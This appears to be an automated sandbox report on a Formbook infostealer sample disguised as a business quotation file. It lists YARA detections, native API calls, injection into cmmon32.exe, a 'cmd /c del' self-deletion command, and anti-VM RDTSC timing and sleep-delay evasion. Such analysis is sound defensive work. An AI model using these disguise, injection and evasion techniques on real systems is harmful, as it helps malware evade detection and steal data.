          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041825D NtReadFile,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041838C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03058390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03058260 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_030582E0 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_030581B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305838C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305825D NtReadFile,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00401026
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041C089
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041C8A4
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041BAC8
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041BB26
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00408C4B
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00408C50
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B493
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F6E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305C8A4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03042FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305C578
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03042D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03048C4B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03048C50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 047DB150 appears 35 times
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000000.242234639.00000000006CC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000009.00000002.302259006.00000000001DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.375144383.000000000139F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000000.304360441.00000000006DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exeBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@5/2
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION LIST FOR NEW ORDER.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QUOTATION LIST FOR NEW ORDER.exeVirustotal: Detection: 61%
          Source: QUOTATION LIST FOR NEW ORDER.exeMetadefender: Detection: 37%
          Source: QUOTATION LIST FOR NEW ORDER.exeReversingLabs: Detection: 63%
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic file information: File size 1347072 > 1048576
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x148400
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0040607C push esi; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041BAC8 push dword ptr [B7831292h]; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041A2E5 push es; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041C2AF pushad ; iretd
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0040C376 push es; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00415C8D push esi; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0482D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0304C376 push es; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B3FB push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305C2AF pushad ; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305A2E5 push es; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305BAF4 push dword ptr [B7831292h]; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0304607C push esi; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03054E36 push edx; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03055599 push ds; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B45C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03055C8D push esi; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77803780051
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000030485E4 second address: 00000000030485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 000000000304896E second address: 0000000003048974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe TID: 5528Thread sleep time: -39425s >= -30000s
